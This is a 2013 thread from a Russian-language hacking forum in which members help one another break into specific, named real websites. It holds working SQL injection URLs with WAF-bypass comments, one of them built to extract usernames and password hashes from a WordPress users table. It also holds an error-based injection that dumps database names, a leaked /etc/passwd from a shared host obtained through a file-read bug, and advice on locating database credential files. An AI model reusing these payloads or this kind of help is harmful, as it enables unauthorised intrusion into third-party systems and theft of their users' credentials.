ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2013, 01:06
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Ups
Ups said:
Имею читалку.
Есть ли способы найти пути до сайта?
В /etc/passwd простыня:
Код:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
........
u1724698:x:505:503::/var/www/u1724698:/bin/false
u1725105:x:508:505::/var/www/u1725105:/bin/false
u1725703:x:514:511::/var/www/u1725703:/bin/bash
u1725757:x:515:512::/var/www/u1725757:/bin/false
u1726055:x:517:514::/var/www/u1726055:/bin/bash
u1726273:x:518:515::/var/www/u1726273:/bin/false
u1726588:x:519:516::/var/www/u1726588:/bin/bash
u1727690:x:525:522::/var/www/u1727690:/bin/false
u1727944:x:526:523::/var/www/u1727944:/bin/bash
u1728689:x:529:526::/var/www/u1728689:/bin/bash
u1730438:x:540:537::/var/www/u1730438:/bin/false
u1730873:x:541:538::/var/www/u1730873:/bin/bash
u1731459:x:542:539::/var/www/u1731459:/bin/false
u1732269:x:545:542::/var/www/u1732269:/bin/bash
u1732843:x:558:555::/var/www/u1732843:/bin/bash
u1736727:x:568:565::/var/www/u1736727:/bin/false
u1733648:x:571:568::/var/www/u1733648:/bin/bash
u1739821:x:580:577::/var/www/u1739821:/bin/bash
u1739860:x:581:578::/var/www/u1739860:/bin/bash
u1740237:x:582:579::/var/www/u1740237:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
u1741842:x:591:588::/var/www/u1741842:/bin/bash
u1742085:x:593:590::/var/www/u1742085:/bin/bash
u1742435:x:594:591::/var/www/u1742435:/bin/bash
u1730937:x:599:596::/var/www/u1730937:/bin/bash
u1743741:x:601:598::/var/www/u1743741:/bin/bash
u1744116:x:603:600::/var/www/u1744116:/bin/bash
u1744426:x:606:603::/var/www/u1744426:/bin/bash
u1744904:x:610:607::/var/www/u1744904:/bin/bash
u1747647:x:620:617::/var/www/u1747647:/bin/bash
u1750941:x:629:626::/var/www/u1750941:/bin/bash
u1753996:x:638:635::/var/www/u1753996:/bin/bash
u1755152:x:643:640::/var/www/u1755152:/bin/bash
и т.д
На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо. читай /etc/httpd/httpd.conf
|
|
|
06.05.2013, 02:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
42754
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
читай /etc/httpd/httpd.conf
HTTP/1.0 404 Not Found
Уже смотрел.
Еще вопрос: где хранятся конфиги с коннектом к БД в IP.Board 3.3.4?
|
|
|
|
06.05.2013, 06:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Ups, в корне посмотрите: "conf_global.php"
|
|
|
|
06.05.2013, 18:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Помогите раскрутить инъекцию с обходом WAF.
В общем я добился вывода версии, юзера etc, но не могу получить имя БД, таблицы, ну и соответветственно содержимое таблиц.
Фильтрую в /*! */ всё подряд, но 406 ошибка.
Заранее спасибо.
Код:
Code:
http://www.lopusina.com/knjiga.html?id=36 /*!union*/(select all 1,/*!version()*/,3,4,5,6,7,8,9,10,11,12)--+
Вывод в 238 строчке исходника. |
|
|
|
08.05.2013, 14:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от None
www.dnrltd.com/job_details.php?id=-64 /*!union*/ (/*!select*/ all 1,2,3,4,5,6,7,8,9,10,11,12,/*!group_concat(column_name)*/,14,15,16 from /*!InForMatioN_SchEma*/.tables where /*!table_name*/ like 0x77705f7573657273 )--+
Помогите прочитать таблицу wp_users
|
|
|
|
08.05.2013, 15:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от MaxFast
MaxFast said:
Помогите прочитать таблицу wp_users
http://www.dnrltd.com/job_details.php?id=-64%20/*!union*/%20%28/*!select*/%20all%201,2,3,4,5,6,7,8,9,10,11,12,/*!concat_ws%280x3a,user_login,user_pass%29*/,14,15,16%20from%20wp_users+limit+1,1%20%29--+
|
|
|
|
08.05.2013, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Код:
Code:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. |
|
|
|
08.05.2013, 23:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от rogatiy
rogatiy said:
Код:
Code:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. Фильтруется union и скобки.
|
|
|
|
09.05.2013, 01:46
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от rogatiy
rogatiy said:
Код:
Code:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. Посредством POST запроса все проходит на ура:
http://pfl.ua/articles/?art=1275511872+or+1+group+by+concat((select+user( )),floor(rand(0)*2))+having+min(0)--+
DATA:
USERflcom_db@localhost
DBflcom_db
DB LIST:
pflcom_db
information_schema
mafpfl
pfl_db
pfl_forum
pflcom_db
|
|
|
|
09.05.2013, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Посоветуйте хороший снифер,можна платный.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
